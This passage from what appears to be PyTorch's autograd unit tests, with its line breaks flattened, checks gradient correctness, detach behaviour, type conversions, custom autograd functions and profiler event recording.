ctx.saved_tensors return grad_output * 2 * y / x double = Double.apply double2 = Double2.apply x = torch.tensor(2).double().requires_grad_() self.assertTrue(gradcheck(double, x)) self.assertTrue(gradgradcheck(double, x)) self.assertTrue(gradcheck(double2, x)) self.assertTrue(gradgradcheck(double2, x)) y = double(x) torch.autograd.grad(y, x, create_graph=True) torch.autograd.grad(y, x) y = double2(x) torch.autograd.grad(y, x, create_graph=True) torch.autograd.grad(y, x) # should not error! def test_detach(self): x = torch.randn(10, 10, requires_grad=True) y = x + 2 y = y.detach() z = y * 4 + 2 self.assertFalse(y.requires_grad) self.assertFalse(z.requires_grad) x = torch.randn(10, 10, requires_grad=True) y = x * 2 y = y.detach() self.assertFalse(y.requires_grad) self.assertIsNone(y.grad_fn) z = x + y z.sum().backward() # This is an incorrect gradient, but we assume that's what the user # wanted. detach() is an advanced option. self.assertEqual(x.grad, torch.ones(10, 10)) # in-place detach x = torch.randn(10, 10, requires_grad=True) y = torch.randn(10, 10, requires_grad=True) a = x * 2 (y + a).sum().backward(retain_graph=True) a.detach_() self.assertFalse(a.requires_grad) (y + a).sum().backward() # this won't backprop to x self.assertEqual(x.grad, torch.ones(10, 10) * 2) self.assertEqual(y.grad, torch.ones(10, 10) * 2) # in-place deatch on a view raises an exception view = x.narrow(0, 1, 4) self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_()) def test_detach_base(self): "detaching base does not detach view" x = torch.randn(10, 10, requires_grad=True) view = x.narrow(0, 1, 4) x.detach_() self.assertFalse(x.requires_grad) self.assertTrue(view.requires_grad) self.assertIsNotNone(view.grad_fn) self.assertIs(view._base, x) def _test_type_conversion_backward(self, t, ): fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True) fvar.double().sum().backward() self.assertEqual(fvar.grad, torch.ones_like(fvar)) self.assertEqual(type(fvar.grad), type(fvar)) dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True) dvar.float().sum().backward() self.assertEqual(dvar.grad, torch.ones_like(dvar)) self.assertEqual(type(dvar.grad), type(dvar)) def test_type_conversions(self): x = torch.randn(5, 5) self.assertIsInstance(x.float(), torch.FloatTensor) self.assertIsInstance(x.int(), torch.IntTensor) if torch.cuda.is_available(): self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor) self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor) self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor) if torch.cuda.device_count() >= 2: x2 = x.float().cuda(1) self.assertIsInstance(x2, torch.cuda.FloatTensor) self.assertIs(x2.get_device(), 1) x2 = x.float().cuda() self.assertIsInstance(x2, torch.cuda.FloatTensor) self.assertIs(x2.get_device(), 0) x2 = x2.cuda(1) self.assertIsInstance(x2, torch.cuda.FloatTensor) self.assertIs(x2.get_device(), 1) y = Variable(torch.randn(5).cuda(1), requires_grad=True) y.cpu().sum().backward() self.assertIs(y.grad.get_device(), 1) self.assertIs(y.long().get_device(), 1) for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]: for y_var in (True, False): y = torch.randint(5, (5, 5), dtype=t.dtype) y = Variable(y) if y_var else y self.assertIsInstance(x.type(t), t) self.assertIsInstance(x.type_as(y), t) # TODO: t.dtype should work t_dtype = t().dtype self.assertIsInstance(x.type(t_dtype), t) self.assertIs(t_dtype, x.type(t_dtype).dtype) self.assertEqual(y.data_ptr(), y.type(t).data_ptr()) if torch.cuda.is_available(): for x_cuda in (True, False): for y_cuda in (True, False): x_c = x.cuda() if x_cuda else x y_c = y.cuda() if y_cuda else y _, y_type = y_c.type().rsplit('.', 1) y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type self.assertEqual(y_c.type(), x_c.type(y_typestr).type()) self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype) self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr()) self._test_type_conversion_backward(lambda x: x) if torch.cuda.is_available(): self._test_type_conversion_backward(lambda x: x.cuda()) if torch.cuda.device_count() >= 2: # one of these has to be the non-default device self._test_type_conversion_backward(lambda x: x.cuda(0)) self._test_type_conversion_backward(lambda x: x.cuda(1)) def test_isolated_node(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) a = x + y b = torch.max(a, 1, True)[1].repeat(1, 5).double() o = (b + a).sum() o.backward() def test_shape(self): x = torch.randn(3, 4) self.assertEqual(2, len(x.shape)) self.assertEqual(x.shape[0], 3) self.assertEqual(x.shape[1], 4) def test_numpy_requires_grad(self): x = torch.randn(2, 2, requires_grad=True) err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead." with self.assertRaisesRegex(RuntimeError, err_msg_outputs): x.numpy() with torch.no_grad(): x.numpy() x = torch.randn(2, 2) x.numpy() with torch.no_grad(): x.numpy() def test_return_leaf(self): class Identity(Function): @staticmethod def forward(ctx, a, b): return a, a + b @staticmethod def backward(ctx, grad_a, grad_b): return grad_a + grad_b, grad_b hook_called = [False] x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) q, p = Identity.apply(x, y) # Make sure hooks only receive grad from usage of q, not x. def hook(grad): hook_called[0] = True self.assertEqual(grad, torch.ones(5, 5)) q.register_hook(hook) (q + p + x).sum().backward() self.assertEqual(x.grad, torch.ones(5, 5) * 3) self.assertEqual(y.grad, torch.ones(5, 5)) self.assertTrue(hook_called[0]) def test_return_leaf_inplace(self): class Inplace(InplaceFunction): @staticmethod def forward(ctx, a, b): ctx.mark_dirty(a) return a.add_(b), b + 2 @staticmethod def backward(ctx, grad_a, grad_b): return grad_a, grad_a + grad_b x = torch.randn(5, 5) y = torch.randn(5, 5, requires_grad=True) q, p = Inplace.apply(x, y) self.assertIs(q, x) self.assertIs(q.grad_fn.__class__, Inplace._backward_cls) self.assertTrue(q.requires_grad) q.sum().backward() self.assertEqual(y.grad, torch.ones(5, 5)) def test_leaf_assignment(self): x = torch.randn(5, 5) y = torch.randn(5, requires_grad=True) z = torch.randn(5, requires_grad=True) x[0] = y x[1] = 2 * z self.assertTrue(x.requires_grad) self.assertIsNot(x.grad_fn, None) x.sum().backward() self.assertEqual(y.grad, torch.ones(5)) self.assertEqual(z.grad, torch.ones(5) * 2) def test_no_grad_assignment(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5) with torch.no_grad(): x[0] = y self.assertTrue(x.requires_grad) self.assertIsNone(x.grad_fn) def test_no_grad_modifies_version(self): x = torch.randn(5, requires_grad=True) y = torch.randn(5, requires_grad=True) z = (x * y).sum() with torch.no_grad(): x *= 2 self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation', lambda: z.backward()) def test_no_grad_input(self): class MyFunction(Function): @staticmethod def forward(self, x): return x @staticmethod def backward(self, grad_output): return grad_output x = torch.randn(5, requires_grad=True) with torch.no_grad(): y = MyFunction.apply(x) self.assertTrue(x.requires_grad) self.assertIsNone(y.grad_fn) def test_backward_copy(self): # This tests checks backward engine for a very subtle bug that appreared # in one of the initial versions of autograd. Gradients tensors were # simply stored in lists while the function waited for all its gradients # to be computed. However, sometimes an output was used multiple times, # so the gradients needed to be summed. Engine used to keep a need_copy # set of tensors that will need a clone upon next addition and removed # them from the set as soon as the clone was performed. However, this # could lead to incorrect results if the same gradient tensor was # buffered in three places in the graph: # 1. When accumulating gradients in one of these places it was cloned # and removed from need_copy set. # 2. When accumulating in second place, it wasn't in the need_copy set, # so the gradients were simply accumulated in-place (which already # modified the grad in 3rd place) # 3. When accumulating in the third place, it wasn't in the need_copy set # as well, so the incoming gradient was summed in-place, yielding # incorrect results in all functions, except the first one. x = torch.ones(5, 5, requires_grad=True) y = torch.ones(5, 5, requires_grad=True) # Simulate that we're in the middle of the graph a = x + 2 b = y + 2 c = x + 2 # This op will just return grad_output two times in backward add1 = a + b add2 = add1 + c # Simulate a long branch, so grad_output will get buffered. for _ in range(4): a = a * 2 b = b * 2 c = c * 2 branch = a + b + c out = add2 + branch # expected gradients are: # for x: 34 (16 from final a, 16 from final c, 2 from add2) # for y: 17 (16 from final b, 1 from add2) grad_output = torch.ones(5, 5) out.backward(grad_output) self.assertEqual(x.grad, torch.ones(5, 5) * 34) self.assertEqual(y.grad, torch.ones(5, 5) * 17) def test_save_none_for_backward(self): test_case = self class MyFn(Function): @staticmethod def forward(ctx, input): ctx.save_for_backward(None, input, None) return input * input @staticmethod def backward(ctx, grad_output): n1, input, n2 = ctx.saved_tensors test_case.assertIsNone(n1) test_case.assertIsNone(n2) return 2 * input * grad_output x = torch.randn(5, 5, requires_grad=True) y = MyFn.apply(x) y.sum().backward() self.assertEqual(x.grad, 2 * x) def test_too_many_grads(self): class MyFn(Function): @staticmethod def forward(ctx, input): return input @staticmethod def backward(ctx, grad_output): return grad_output, None, None x = torch.randn(5, 5, requires_grad=True) y = MyFn.apply(x) y.sum().backward() self.assertEqual(x.grad, torch.ones_like(x)) def test_pickle(self): x = torch.randn(10, 10, requires_grad=True) y = torch.randn(10, 10, requires_grad=False) def assert_strict_equal(var1, var2): self.assertEqual(var1, var2) self.assertEqual(var1.requires_grad, var2.requires_grad) serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)] for dump in serialized: xc, yc = pickle.loads(dump) assert_strict_equal(xc, x) assert_strict_equal(yc, y) def test_dep_nograd(self): class F1(Function): @staticmethod def forward(ctx, input): out = torch.randn(input.size()) ctx.mark_non_differentiable(out) return input, out @staticmethod def backward(ctx, grad_output, ignored): return grad_output class F2(Function): @staticmethod def forward(ctx, input, ignored): return input @staticmethod def backward(ctx, grad_output): return grad_output, None x = torch.randn(5, requires_grad=True) a, b = F1.apply(x) b = b + 1 # separate F1 from F2 by another op self.assertTrue(a.requires_grad) self.assertFalse(b.requires_grad) c = F2.apply(a, b) c.backward(torch.ones(c.size())) self.assertEqual(x.grad, torch.ones(x.size())) def test_set_grad_enabled(self): x = torch.tensor([1.], requires_grad=True) with torch.set_grad_enabled(False): y = x * 2 self.assertFalse(y.requires_grad) with torch.set_grad_enabled(True): y = x * 2 self.assertTrue(y.requires_grad) with torch.set_grad_enabled(False): torch.set_grad_enabled(True) y = x * 2 self.assertTrue(y.requires_grad) def test_simple_reentrant(self): y_data = torch.randn(2, 2) class Reenter(Function): @staticmethod def forward(ctx, x): with torch.enable_grad(): ctx.x = Variable(x, requires_grad=True) ctx.y = Variable(y_data, requires_grad=True) ctx.output_var = ctx.x * ctx.y return ctx.output_var.detach() @staticmethod def backward(ctx, grad_output): with torch.enable_grad(): ctx.output_var.sum().backward() return ctx.x.grad * grad_output # Reentrant starts on CPU thread, finishs on GPU thread x = torch.randn(2, 2, requires_grad=True) out = Reenter.apply(x) out.sum().backward() self.assertEqual(x.grad, y_data) def test_reentrant_child_error(self): # Parent graph. a = torch.rand(3, 3, requires_grad=True) c = a * a # Reentrant child graph. b = torch.rand(3, 3, requires_grad=True) e = b * b f = TestAutograd.SimulateBackwardError.apply(e) reentrant_root = f.sum() class ReentrantFunc(Function): @staticmethod def forward(ctx, inp): return inp.clone() @staticmethod def backward(ctx, grad): # Reentrant backward in child will throw an error. reentrant_root.backward() return grad d = ReentrantFunc.apply(c) with self.assertRaisesRegex(Exception, 'Simulate error'): d.sum().backward() def test_broadcast_tensors(self): f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True), torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True), torch.randn(1, 1, dtype=torch.double, requires_grad=True), torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_broadcast_tensors", "broadcast", lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d), True, f_args_variable, f_args_tensor) def test_block_diag(self): f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True), torch.randn(2, S, dtype=torch.double, requires_grad=True), torch.randn(3, S, dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_block_diag", "block_diag", lambda a, b, c: torch.block_diag(a, b, c), True, f_args_variable, f_args_tensor) def test_cat(self): f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True), torch.randn(2, S, S, dtype=torch.double, requires_grad=True), torch.randn(3, S, S, dtype=torch.double, requires_grad=True), 0) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat", "cat", lambda a, b, c, dim: torch.cat((a, b, c), dim), True, f_args_variable, f_args_tensor) def test_cat_negdim_1(self): f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True), torch.randn(S, S, 2, dtype=torch.double, requires_grad=True), torch.randn(S, S, 3, dtype=torch.double, requires_grad=True), -1) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_negdim_1", "cat", lambda a, b, c, dim: torch.cat((a, b, c), dim), True, f_args_variable, f_args_tensor) def test_cat_negdim_2(self): f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True), torch.randn(S, 2, S, dtype=torch.double, requires_grad=True), torch.randn(S, 3, S, dtype=torch.double, requires_grad=True), -2) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_negdim_2", "cat", lambda a, b, c, dim: torch.cat((a, b, c), dim), True, f_args_variable, f_args_tensor) def test_cat_empty_legacy(self): f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True), torch.randn(S, S, dtype=torch.double, requires_grad=True)) # gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere, # hence False passed below, but gradcheck checked explicitly. f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_empty_legacy", "cat", lambda a, b: torch.cat((a, b)), False, f_args_variable, f_args_tensor) self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION)) def test_cat_empty(self): f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True), torch.randn(S, S, dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_cat_empty", "cat", lambda a, b: torch.cat((a, b)), True, f_args_variable, f_args_tensor) def test_trapz(self): f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True), torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True)) f_args_tensor = deepcopy(unpack_variables(f_args_variable)) run_functional_checks(self, "test_trapz", "trapz", lambda y, x: torch.trapz(y, x), True, f_args_variable, f_args_tensor) def test_var_mean_differentiable(self): dim = [2, 4] keepdim = False input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True) input2 = deepcopy(input1) var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim) var2 = input2.var(dim=dim, keepdim=keepdim) mean2 = input2.mean(dim=dim, keepdim=keepdim) grad = torch.randn(3, 4, 6, 3, requires_grad=True) r1 = var1 * var1 * mean1 * mean1 r2 = var2 * var2 * mean2 * mean2 self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0)) torch.autograd.backward(r1, grad) torch.autograd.backward(r2, grad) self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0)) @slowTest @skipIfNoLapack def test_lobpcg(self): def func(k, A, largest=True, B=None): X_shape = list(A.shape) X_shape[-1] = k X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device) if A.dim() > 2: X = X.expand(X_shape) D, U = torch.lobpcg(A=A, k=k, B=B, X=X) # LOBPCG uses a random initial eigenspace approximation # if parameter `X` is not provided. # This may cause a non-deterministic behavior # when it comes to the sign of an eigenvector # (note if v is an eigenvector, so is -v), # hence we eliminate this non-determinism # by making sure that each column of U # gets multiplied by the sign of its max (in absolute value) element. # Also, gradcheck changes the content of the input by +/- eps (default to 1e-06) # to compute the numerical gradient which can also cause the signs to flip. _, idx = U.abs().max(-2, keepdim=True) sign = U.gather(-2, idx).sign() U = U * sign return D, U def run_symeig_test(k, sizes, largest=True): A = torch.rand(*sizes).double() A = A.matmul(A.transpose(-1, -2)) / 10 A.requires_grad_(True) gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False) # Custom gradient vectors for better stability due to some # non-determinism in the lobpcg's forward. # Note it is not required if symeig is in forward instead (tested). D_grad = torch.rand(*A.shape[:-2], k) / 100 U_grad = torch.rand(*A.shape[:-1], k) / 100 gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False) # check whether A.grad is symmetric A = A.detach().requires_grad_(True) D, U = func(k, A, largest) (D.sum() + U.sum()).backward() self.assertEqual(A.grad, A.grad.transpose(-1, -2)) # the tests below take about 1-2 minutes to finish, # but we want to be extra sure that the backward is correct. for largest in [True, False]: run_symeig_test(1, (6, 6), largest=largest) run_symeig_test(1, (2, 6, 6), largest=largest) run_symeig_test(1, (2, 2, 6, 6), largest=largest) run_symeig_test(2, (6, 6), largest=largest) run_symeig_test(2, (2, 6, 6), largest=largest) run_symeig_test(2, (2, 2, 6, 6), largest=largest) run_symeig_test(3, (9, 9), largest=largest) run_symeig_test(3, (2, 9, 9), largest=largest) run_symeig_test(3, (2, 2, 9, 9), largest=largest) def test_variable_traverse(self): def get_out_and_unrefed_cycle(): inp = torch.randn(10, requires_grad=True) tmp = inp.view(10, 1) out = tmp.view(10) # Create a reference cycle that contains an # intermediary Variable in the graph my_list = [] my_list.append(tmp) my_list.append(my_list) return out out = get_out_and_unrefed_cycle() gc.collect() # This will segfault if things have been erroneously released out.backward(torch.randn(out.size())) def test_norm_subgradient(self): def run_test(input_size, norm_deg): input = torch.zeros(*input_size, requires_grad=True) input.norm(norm_deg).backward() self.assertEqual(input.grad.abs().sum(), 0) run_test((10,), 2) run_test((10, 10), 2) run_test((10,), 3) run_test((10,), 1) run_test((10,), 1.5) run_test((10,), inf) def test_norm_inf_subgradient(self): def run_test(input, expected, dim=None): x = torch.tensor(input, requires_grad=True) out = x.norm(inf, dim=dim, keepdim=True) out.backward(torch.ones(out.size())) self.assertEqual(x.grad, expected) run_test([0., 0., 0.], [0., 0., 0.]) run_test([1., 0., 1.], [0.5, 0., 0.5]) run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]]) run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,)) run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2)) def test_pow_zero_tensor_gradient(self): def run_test(input_size, exponent): input = torch.zeros(*input_size, requires_grad=True) input.pow(exponent).sum().backward() self.assertEqual(input.grad.abs().sum(), 0) run_test((10,), torch.zeros(10)) run_test((10, 10), torch.zeros(10, 10)) run_test((10,), 0) def test_pow_scalar_base(self): a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_() gradcheck(lambda a: torch.pow(2, a), (a,)) def test_sinc(self): # The derivative of sinc(x) at x=0 has to be special cased. # A naive computation will result in 0/0 -> NaN. # We also need to be careful when we are very close to 0, as the # derivative's denominator is squared, and there are some floats # that are positive and whose squares are zero. a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0], dtype=torch.double, requires_grad=True) gradcheck(torch.sinc, a) def test_igamma(self): # 1e-3 offset to avoid zeros # NOTE: derivative for s is not implemented s = (torch.rand(100, dtype=torch.double) + 1e-3) x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_() gradcheck(torch.igamma, (s, x)) gradgradcheck(torch.igamma, (s, x)) def test_igammac(self): # 1e-3 offset to avoid zeros in s # NOTE: derivative for s is not implemented s = (torch.rand(100, dtype=torch.double) + 1e-3) x = (torch.rand(100, dtype=torch.double)).requires_grad_() gradcheck(torch.igamma, (s, x)) gradgradcheck(torch.igamma, (s, x)) def test_profiler(self): x = torch.randn(10, 10) with profile(use_kineto=kineto_available()) as p: self.assertTrue(torch.autograd._profiler_enabled()) y = x * 2 + 4 self.assertFalse(torch.autograd._profiler_enabled()) names = ['aten::mul', 'aten::add'] found_indices = set() for evt in p.function_events: if evt.name in names: found_indices.add(names.index(evt.name)) self.assertEquals(len(found_indices), len(names)) def test_profiler_seq_nr(self): with profile(use_kineto=kineto_available()) as p: x = torch.randn(10, 10, requires_grad=True) y = torch.randn(10, 10, requires_grad=True) z = x + y s = z.sum() s.backward() print(p.key_averages().table( sort_by="self_cpu_time_total", row_limit=-1)) # expecting aten::add, aten::sum to have the sequence numbers, # expecting the corresponding backward nodes to have the same numbers # as the forward ops add_seq_nr = -1 sum_seq_nr = -1 found_add = found_sum = False found_bwd_add = found_bwd_sum = False found_empty = False for e in p.function_events: if e.name == "aten::add": add_seq_nr = e.sequence_nr self.assertFalse(found_add) found_add = True elif e.name == "aten::sum": sum_seq_nr = e.sequence_nr self.assertFalse(found_sum) found_sum = True elif "Add" in e.name and "Backward" in e.name: self.assertEqual(e.sequence_nr, add_seq_nr) self.assertFalse(found_bwd_add) found_bwd_add = True elif "Sum" in e.name and "Backward" in e.name: self.assertEqual(e.sequence_nr, sum_seq_nr) self.assertFalse(found_bwd_sum) found_bwd_sum = True # check that nested ops (e.g. empty) don't have # sequence number if e.name == "aten::empty": self.assertEqual(e.sequence_nr, -1) found_empty = True self.assertGreaterEqual(add_seq_nr, 0) self.assertGreaterEqual(sum_seq_nr, 0) self.assertNotEqual(add_seq_nr, sum_seq_nr) self.assertTrue(found_add) self.assertTrue(found_sum) self.assertTrue(found_bwd_add) self.assertTrue(found_bwd_sum) self.assertTrue(found_empty) def test_profiler_unboxed_only(self): x = torch.rand(3, 4) with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof: x.resize_([3, 2]) def test_profiler_propagation(self): def foo(x): with record_function("in_foo") as rf: return x * 2 x = torch.rand(3, 4) traced_foo = torch.jit.trace(foo, x) def bar(x): with record_function("in_bar") as rf: # we expect that profiler will be able # propagate across fork fut = torch.jit._fork(traced_foo, x) y = torch.jit._wait(fut) # note: continuation (and rf's end) can # be executed in a different thread with record_function("in_bar_after_wait") as rf2: y = y * 2 return y traced_bar = torch.jit.trace(bar, x) with profile(use_kineto=kineto_available()) as p: traced_bar(x) found_foo = False found_bar = False found_bar_after_wait = False for info in p.function_events: if info.name == "in_foo": self.assertFalse(found_foo) found_foo = True elif info.name == "in_bar": self.assertFalse(found_bar) found_bar = True elif info.name == "in_bar_after_wait": self.assertFalse(found_bar_after_wait) found_bar_after_wait = True self.assertTrue(found_foo) self.assertTrue(found_bar) self.assertTrue(found_bar_after_wait) def test_record_function_callbacks(self): x = torch.randn(10, 10) with profile(use_kineto=kineto_available()) as p: with record_function("foo"): y = x * 2 + 4 function_events = p.function_events foo_event = [event for event in function_events if "foo" in event.name][0] self.assertEqual(foo_event.count, 1) def test_profiler_aggregation_fake(self): events = EventList() id = [0] def get_id(): id[0] = id[0] + 1 return id[0] # [[thread_id, [(start, end, id), ....]], ...] # Using list instead of a dict so order is guaranteed for any Python # version threads = [ [1, [(0, 1, get_id()), (1, 2, get_id())]], [0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]], ] for thread, ranges in threads: for range in ranges: assert(len(range) == 3) events.append( FunctionEvent( id=range[2], node_id=0, name="", thread=thread, start_us=range[0], end_us=range[1], ) ) events._populate_cpu_children() # Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2] # as a child of [1, 3] res = [[], [], [], [], [4]] def get_children_ids(event): return [child.id for child in event.cpu_children] assert([get_children_ids(event) for event in events] == res) def test_profiler_aggregation_table(self): """ Test if the profiling result is aggregated for `str(prof)` See: https://github.com/pytorch/pytorch/issues/37500 """ x = torch.randn(1024) with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof: torch.einsum("i->", x) prof_str = str(prof) prof_table = prof.table() self.assertEqual(prof_table, prof_str) def test_profiler_function_event_avg(self): avg = FunctionEventAvg() avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15)) avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30)) avg.add(avg) self.assertEqual(avg.key, "foo") # aggregate stats self.assertEqual(avg.count, 4) self.assertEqual(avg.cpu_time_total, 30) self.assertEqual(avg.self_cpu_time_total, 30) self.assertEqual(avg.cuda_time_total, 0) # average stats self.assertEqual(avg.cpu_time, 7.5) self.assertEqual(avg.cuda_time_total, 0) def test_profiler_shapes(self): print("") layer1 = torch.nn.Linear(20, 30) layer2 = torch.nn.Linear(30, 40) input = torch.randn(128, 20) with profile(record_shapes=True, use_kineto=kineto_available()) as prof: layer2(layer1(input)) print(prof.function_events) linear_expected_shapes = [ [[128, 20], [30, 20], [30]], [[128, 30], [40, 30], [40]], ] found_indices = set() for event in prof.function_events: if event.name == "aten::linear": self.assertTrue(event.input_shapes in linear_expected_shapes) found_indices.add(linear_expected_shapes.index(event.input_shapes)) self.assertEqual(len(found_indices), len(linear_expected_shapes)) def test_profiler_aggregation_lstm(self): print("") rnn = torch.nn.LSTM(10, 20, 2) total_time_s = 0 with profile(record_shapes=True, use_kineto=kineto_available()) as prof: for i in range(20): input = torch.randn(5, 3, 10) h = torch.randn(2, 3, 20) c = torch.randn(2, 3, 20) start = time.time() rnn(input, (h, c)) end = time.time() total_time_s += end - start print(prof.table( sort_by="self_cpu_time_total", row_limit=10, header="TEST")) print(prof.key_averages(group_by_input_shape=True).table( sort_by="self_cpu_time_total", row_limit=10)) print(prof.table( sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True)) print(prof.key_averages(group_by_input_shape=True).table( sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True)) total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default print( "Total time based on python measurements: ", format_time(total_time_us) ) print( "CPU time measurement python side overhead: {:.2f}%".format( (total_time_us / prof.self_cpu_time_total - 1.0) * 100.0 ) ) if sys.platform != "win32": with tempfile.NamedTemporaryFile() as trace_file: prof.export_chrome_trace(trace_file.name) def test_record_function(self): x = torch.randn(10, 10) def forward(x): with record_function("outer"): y = x * 2 + 4 with record_function("inner"): y = y - 1 y = y / 1 forward(x) with profile(use_kineto=kineto_available()) as p: forward(x) events = p.function_events important_events = [ 'outer', 'aten::mul', 'aten::add', 'inner', 'aten::sub', 'aten::div' ] idx = 0 for info in events: if info.name == important_events[idx]: idx = idx + 1 if idx == len(important_events): break self.assertEqual(idx, len(important_events)) # We can also use record_function to decorate arbitrary function @record_function('my_func') def f(x, y): return x + y with profile(use_kineto=kineto_available()) as p: f(1, 2) self.assertTrue('my_func' in str(p)) def test_record_function_multithreaded(self): rf = record_function("outer") rf.__enter__() with record_function("inner"): # test that exiting the record function after starting another one # doesn't throw. rf.__exit__(None, None, None) with record_function("inner"): rf.__enter__() # test that exiting the record function after ending another one # doesn't throw. rf.__exit__(None, None, None) def test_dir(self): x = torch.randn(10, 10) keys = dir(x) self.assertIn('shape', keys) # real and imag are only implemented for complex tensors. y = torch.randn(10, 10, dtype=torch.cfloat) for key in ['real', 'imag']: self.assertRaises(RuntimeError, lambda: hasattr(x, key)) self.assertTrue(hasattr(y, key)) keys.remove(key) for key in keys: self.assertTrue(hasattr(x, key)) def test_as_strided(self): def test(x, prepro_fn, size, strides, offset=None): x = x.to(torch.double).detach().requires_grad_() # Check that forward will **not** resize storage because it may # cause NaN in output and fail numerical Jacobian check consequently with torch.no_grad(): y = prepro_fn(x) if prepro_fn is not None else x max_offset = sum((si - 1) * st for si, st in zip(size, strides)) max_offset += offset if offset is not None else y.storage_offset() assert max_offset < len(y.storage()), "test case resizes storage" def closure(x): if prepro_fn is not None: x = prepro_fn(x) return x.as_strided(size, strides, offset) gradcheck(closure, [x]) gradgradcheck(closure, [x]) # test test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2) # test crazy stride at dim with size 1 case test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2) # test expand case test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2) test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4) test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0) # test non-expand overlapping case test(torch.randn(35), None, [6, 6], [5, 1], 2) test(torch.randn(15), None, [3, 2], [3, 6], 2) # test transpose case test(torch.randn(3, 4), None, [4, 3], [1, 4]) # test "getting things outside the input" case x = torch.randn(6, 2) test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3]) # test select on expanded input case test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0) def _test_lerp_tensor_weights(self, cast): def construct_inputs(*shapes): start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_() end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_() weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_() return [start, end, weight] all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting ((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1 ((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1 ((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1 ((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2 ((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2 ((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2 ((3, 3), (3, 3, 3), (3,))] # all broadcasting for shapes in all_test_shapes: cur_inputs = construct_inputs(*shapes) gradcheck(torch.lerp, cur_inputs) gradgradcheck(torch.lerp, cur_inputs) def 